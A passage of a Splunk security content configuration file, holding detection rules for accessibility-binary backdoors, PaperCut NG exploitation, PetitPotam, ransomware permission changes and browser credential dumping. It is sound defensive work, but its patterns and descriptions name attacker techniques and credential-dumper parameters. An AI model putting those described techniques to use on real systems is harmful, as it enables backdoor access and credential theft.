Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where (All_Traffic.dest_port= 389 OR All_Traffic.dest_port= 636 OR All_Traffic.dest_port = 1389 OR All_Traffic.dest_port = 1099 ) by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as connection_to_CNC] | table _time dest parent_process_name process_name process_path process connection_to_CNC dest_port| `outbound_network_connection_from_java_using_default_ports_filter` [ESCU - Overwriting Accessibility Binaries - Rule] action.escu = 0 action.escu.enabled = 1 description = Microsoft Windows contains accessibility features that can be launched with a key combination before a user has logged in. An adversary can modify or replace these programs so they can get a command prompt or backdoor without logging in to the system. This search looks for modifications to these binaries. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546", "T1546.008"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Microsoft Windows contains accessibility features that can be launched with a key combination before a user has logged in. An adversary can modify or replace these programs so they can get a command prompt or backdoor without logging in to the system. This search looks for modifications to these binaries. action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data. action.escu.known_false_positives = Microsoft may provide updates to these binaries. Verify that these changes do not correspond with your normal software update cycle. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Overwriting Accessibility Binaries - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation", "Flax Typhoon"] action.risk = 1 action.risk.param._risk_message = A suspicious file modification or replace in $file_path$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Overwriting Accessibility Binaries - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation", "Flax Typhoon"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546", "T1546.008"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Microsoft Windows contains accessibility features that can be launched with a key combination before a user has logged in. An adversary can modify or replace these programs so they can get a command prompt or backdoor without logging in to the system. This search looks for modifications to these binaries. action.notable.param.rule_title = Overwriting Accessibility Binaries action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem where (Filesystem.file_path=*\\Windows\\System32\\sethc.exe* OR Filesystem.file_path=*\\Windows\\System32\\utilman.exe* OR Filesystem.file_path=*\\Windows\\System32\\osk.exe* OR Filesystem.file_path=*\\Windows\\System32\\Magnify.exe* OR Filesystem.file_path=*\\Windows\\System32\\Narrator.exe* OR Filesystem.file_path=*\\Windows\\System32\\DisplaySwitch.exe* OR Filesystem.file_path=*\\Windows\\System32\\AtBroker.exe*) by Filesystem.file_name Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `overwriting_accessibility_binaries_filter` [ESCU - PaperCut NG Suspicious Behavior Debug Log - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic is designed to monitor and detect potential exploitation attempts targeting a PaperCut NG server by analyzing its debug log data. By focusing on public IP addresses accessing the PaperCut NG instance, this analytic aims to identify unauthorized or suspicious access attempts. Furthermore, it searches for specific URIs that have been discovered in the proof of concept code, which are associated with known exploits or vulnerabilities. The analytic is focused on the user admin. Regex is used mainly because the log is not parsed by Splunk and there is no TA for this debug log. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic is designed to monitor and detect potential exploitation attempts targeting a PaperCut NG server by analyzing its debug log data. By focusing on public IP addresses accessing the PaperCut NG instance, this analytic aims to identify unauthorized or suspicious access attempts. Furthermore, it searches for specific URIs that have been discovered in the proof of concept code, which are associated with known exploits or vulnerabilities. The analytic is focused on the user admin. Regex is used mainly because the log is not parsed by Splunk and there is no TA for this debug log. action.escu.how_to_implement = Debug logs must be enabled and shipped to Splunk in order to properly identify behavior with this analytic. action.escu.known_false_positives = False positives may be present, as this is based on the admin user accessing the Papercut NG instance from a public IP address. Filter as needed. action.escu.creation_date = 2023-05-15 action.escu.modification_date = 2023-05-15 action.escu.confidence = high action.escu.full_search_name = ESCU - PaperCut NG Suspicious Behavior Debug Log - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["PaperCut MF NG Vulnerability"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - PaperCut NG Suspicious Behavior Debug Log - Rule action.correlationsearch.annotations = {"analytic_story": ["PaperCut MF NG Vulnerability"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `papercutng` (loginType=Admin OR userName=admin) | eval uri_match=if(match(_raw, "(?i)(\/app\?service=page\/SetupCompleted|\/app|\/app\?service=page\/PrinterList|\/app\?service=direct\/1\/PrinterList\/selectPrinter&sp=l1001|\/app\?service=direct\/1\/PrinterDetails\/printerOptionsTab\.tab)"), "URI matches", null()) | eval ip_match=if(match(_raw, "(?i)((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))") AND NOT match(_raw, "(?i)(10\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|(172\.(1[6-9]|2[0-9]|3[0-1])\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|(192\.168\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"), "IP matches", null()) | where (isnotnull(uri_match) OR isnotnull(ip_match)) | stats sparkline, count, values(uri_match) AS uri_match, values(ip_match) AS ip_match latest(_raw) BY host, index, sourcetype | `papercut_ng_suspicious_behavior_debug_log_filter` [ESCU - Password Policy Discovery with Net - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `net.exe` or `net1.exe` with command line arguments used to obtain the domain password policy. Red Teams and adversaries may leverage `net.exe` for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `net.exe` or `net1.exe` with command line arguments used to obtain the domain password policy. Red Teams and adversaries may leverage `net.exe` for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-26 action.escu.modification_date = 2021-08-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Password Policy Discovery with Net - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Password Policy Discovery with Net - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe" OR Processes.process_name="net1.exe") AND Processes.process = "*accounts*" AND Processes.process = "*/domain*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `password_policy_discovery_with_net_filter` [ESCU - Permission Modification using Takeown App - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a modification of file or directory permission using takeown.exe windows app. This technique was seen in some ransomware that take the ownership of a folder or files to encrypt or delete it. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a modification of file or directory permission using takeown.exe windows app. This technique was seen in some ransomware that take the ownership of a folder or files to encrypt or delete it. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = takeown.exe is a normal windows application that may used by network operator. action.escu.creation_date = 2021-06-10 action.escu.modification_date = 2021-06-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Permission Modification using Takeown App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Sandworm Tools"] action.risk = 1 action.risk.param._risk_message = A suspicious of execution of $process_name$ with process id $process_id$ and commandline $process$ to modify permission of directory or files in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Permission Modification using Takeown App - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Sandworm Tools"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a modification of file or directory permission using takeown.exe windows app. This technique was seen in some ransomware that take the ownership of a folder or files to encrypt or delete it. action.notable.param.rule_title = Permission Modification using Takeown App action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "takeown.exe" Processes.process = "*/f*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `permission_modification_using_takeown_app_filter` [ESCU - PetitPotam Network Share Access Request - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes Windows Event Code 5145, "A network share object was checked to see whether client can be granted desired access". During our research into PetitPotam, CVE-2021-36942, we identified the ocurrence of this event on the target host with specific values. \ To enable 5145 events via Group Policy - Computer Configuration->Polices->Windows Settings->Security Settings->Advanced Audit Policy Configuration. Expand this node, go to Object Access (Audit Polices->Object Access), then select the Setting Audit Detailed File Share Audit \ It is possible this is not enabled by default and may need to be reviewed and enabled. \ During triage, review parallel security events to identify further suspicious activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1187"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes Windows Event Code 5145, "A network share object was checked to see whether client can be granted desired access". During our research into PetitPotam, CVE-2021-36942, we identified the ocurrence of this event on the target host with specific values. \ To enable 5145 events via Group Policy - Computer Configuration->Polices->Windows Settings->Security Settings->Advanced Audit Policy Configuration. Expand this node, go to Object Access (Audit Polices->Object Access), then select the Setting Audit Detailed File Share Audit \ It is possible this is not enabled by default and may need to be reviewed and enabled. \ During triage, review parallel security events to identify further suspicious activity. action.escu.how_to_implement = Windows Event Code 5145 is required to utilize this analytic and it may not be enabled in most environments. action.escu.known_false_positives = False positives have been limited when the Anonymous Logon is used for Account Name. action.escu.creation_date = 2021-08-31 action.escu.modification_date = 2021-08-31 action.escu.confidence = high action.escu.full_search_name = ESCU - PetitPotam Network Share Access Request - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["PetitPotam NTLM Relay on Active Directory Certificate Services"] action.risk = 1 action.risk.param._risk_message = A remote host is enumerating a $dest$ to identify permissions. This is a precursor event to CVE-2021-36942, PetitPotam. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PetitPotam Network Share Access Request - Rule action.correlationsearch.annotations = {"analytic_story": ["PetitPotam NTLM Relay on Active Directory Certificate Services"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-36942"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1187"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes Windows Event Code 5145, "A network share object was checked to see whether client can be granted desired access". During our research into PetitPotam, CVE-2021-36942, we identified the ocurrence of this event on the target host with specific values. \ To enable 5145 events via Group Policy - Computer Configuration->Polices->Windows Settings->Security Settings->Advanced Audit Policy Configuration. Expand this node, go to Object Access (Audit Polices->Object Access), then select the Setting Audit Detailed File Share Audit \ It is possible this is not enabled by default and may need to be reviewed and enabled. \ During triage, review parallel security events to identify further suspicious activity. action.notable.param.rule_title = PetitPotam Network Share Access Request action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` Account_Name="ANONYMOUS LOGON" EventCode=5145 Relative_Target_Name=lsarpc | stats count min(_time) as firstTime max(_time) as lastTime by dest, Security_ID, Share_Name, Source_Address, Accesses, Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `petitpotam_network_share_access_request_filter` [ESCU - PetitPotam Suspicious Kerberos TGT Request - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifes Event Code 4768, A `Kerberos authentication ticket (TGT) was requested`, successfull occurs. This behavior has been identified to assist with detecting PetitPotam, CVE-2021-36942. Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning, we recommend filtering Account_Name to Domain Controllers for your environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifes Event Code 4768, A `Kerberos authentication ticket (TGT) was requested`, successfull occurs. This behavior has been identified to assist with detecting PetitPotam, CVE-2021-36942. Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning, we recommend filtering Account_Name to Domain Controllers for your environment. action.escu.how_to_implement = The following analytic requires Event Code 4768. Ensure that it is logging no Domain Controllers and appearing in Splunk. action.escu.known_false_positives = False positives are possible if the environment is using certificates for authentication. action.escu.creation_date = 2021-08-31 action.escu.modification_date = 2021-08-31 action.escu.confidence = high action.escu.full_search_name = ESCU - PetitPotam Suspicious Kerberos TGT Request - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["PetitPotam NTLM Relay on Active Directory Certificate Services", "Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = A Kerberos TGT was requested in a non-standard manner against $dest$, potentially related to CVE-2021-36942, PetitPotam. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PetitPotam Suspicious Kerberos TGT Request - Rule action.correlationsearch.annotations = {"analytic_story": ["PetitPotam NTLM Relay on Active Directory Certificate Services", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-36942"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifes Event Code 4768, A `Kerberos authentication ticket (TGT) was requested`, successfull occurs. This behavior has been identified to assist with detecting PetitPotam, CVE-2021-36942. Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning, we recommend filtering Account_Name to Domain Controllers for your environment. action.notable.param.rule_title = PetitPotam Suspicious Kerberos TGT Request action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4768 Client_Address!="::1" Certificate_Thumbprint!="" Account_Name=*$ | stats count min(_time) as firstTime max(_time) as lastTime by dest, Account_Name, Client_Address, action, Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `petitpotam_suspicious_kerberos_tgt_request_filter` [ESCU - Ping Sleep Batch Command - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will identify the possible execution of ping sleep batch commands. This technique was seen in several malware samples and is used to trigger sleep times without explicitly calling sleep functions or commandlets. The goal is to delay the execution of malicious code and bypass detection or sandbox analysis. This detection can be a good indicator of a process delaying its execution for malicious purposes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1497", "T1497.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic will identify the possible execution of ping sleep batch commands. This technique was seen in several malware samples and is used to trigger sleep times without explicitly calling sleep functions or commandlets. The goal is to delay the execution of malicious code and bypass detection or sandbox analysis. This detection can be a good indicator of a process delaying its execution for malicious purposes. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator may execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Ping Sleep Batch Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "WhisperGate", "BlackByte Ransomware", "Warzone RAT"] action.risk = 1 action.risk.param._risk_message = suspicious $process$ commandline run in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Ping Sleep Batch Command - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "WhisperGate", "BlackByte Ransomware", "Warzone RAT"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1497", "T1497.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_ping` (Processes.parent_process = "*ping*" Processes.parent_process = *-n* Processes.parent_process="* Nul*"Processes.parent_process="*>*") OR (Processes.process = "*ping*" Processes.process = *-n* Processes.process="* Nul*"Processes.process="*>*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `ping_sleep_batch_command_filter` [ESCU - Possible Browser Pass View Parameter - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will detect if a suspicious process contains a commandline parameter related to a web browser credential dumper. This technique is used by Remcos RAT malware which uses the Nirsoft webbrowserpassview.exe application to dump web browser credentials. Remcos uses the "/stext" command line to dump the credentials in text format. This Hunting query is a good indicator of hosts suffering from possible Remcos RAT infection. Since the hunting query is based on the parameter command and the possible path where it will save the text credential information, it may catch normal tools that are using the same command and behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555.003", "T1555"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic will detect if a suspicious process contains a commandline parameter related to a web browser credential dumper. This technique is used by Remcos RAT malware which uses the Nirsoft webbrowserpassview.exe application to dump web browser credentials. Remcos uses the "/stext" command line to dump the credentials in text format. This Hunting query is a good indicator of hosts suffering from possible Remcos RAT infection. Since the hunting query is based on the parameter command and the possible path where it will save the text credential information, it may catch normal tools that are using the same command and behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positive is quite limited. Filter is needed action.escu.creation_date = 2021-11-22 action.escu.modification_date = 2021-11-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Possible Browser Pass View Parameter - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Remcos"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Possible Browser Pass View Parameter - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 40, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555.003", "T1555"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*/stext *", "*/shtml *", "*/LoadPasswordsIE*", "*/LoadPasswordsFirefox*", "*/LoadPasswordsChrome*", "*/LoadPasswordsOpera*", "*/LoadPasswordsSafari*" , "*/UseOperaPasswordFile*", "*/OperaPasswordFile*","*/stab*", "*/scomma*", "*/stabular*", "*/shtml*", "*/sverhtml*", "*/sxml*", "*/skeepass*" ) AND Processes.process IN ("*\\temp\\*", "*\\users\\public\\*", "*\\programdata\\*") by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `possible_browser_pass_view_parameter_filter` [ESCU - Possible Lateral Movement PowerShell Spawn - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to identify possible lateral movement attacks that involve the spawning of a PowerShell process as a child or grandchild process of commonly abused processes. These processes include services.exe, wmiprsve.exe, svchost.exe, wsmprovhost.exe, and mmc.exe.\ Such behavior is indicative of legitimate Windows features such as the Service Control Manager, Windows Management Instrumentation, Task Scheduler, Windows Remote Management, and the DCOM protocol being abused to start a process on a remote endpoint. This behavior is often seen during lateral movement techniques where adversaries or red teams abuse these services for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1021", "T1021.003", "T1021.006", "T1047", "T1053.005", "T1543.003", "T1059.001", "T1218.014"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to identify possible lateral movement attacks that involve the spawning of a PowerShell process as a child or grandchild process of commonly abused processes. These processes include services.exe, wmiprsve.exe, svchost.exe, wsmprovhost.exe, and mmc.exe.\ Such behavior is indicative of legitimate Windows features such as the Service Control Manager, Windows Management Instrumentation, Task Scheduler, Windows Remote Management, and the DCOM protocol being abused to start a process on a remote endpoint. This behavior is often seen during lateral movement techniques where adversaries or red teams abuse these services for lateral movement and remote code execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate applications may spawn PowerShell as a child process of the the identified processes. Filter as needed. action.escu.creation_date = 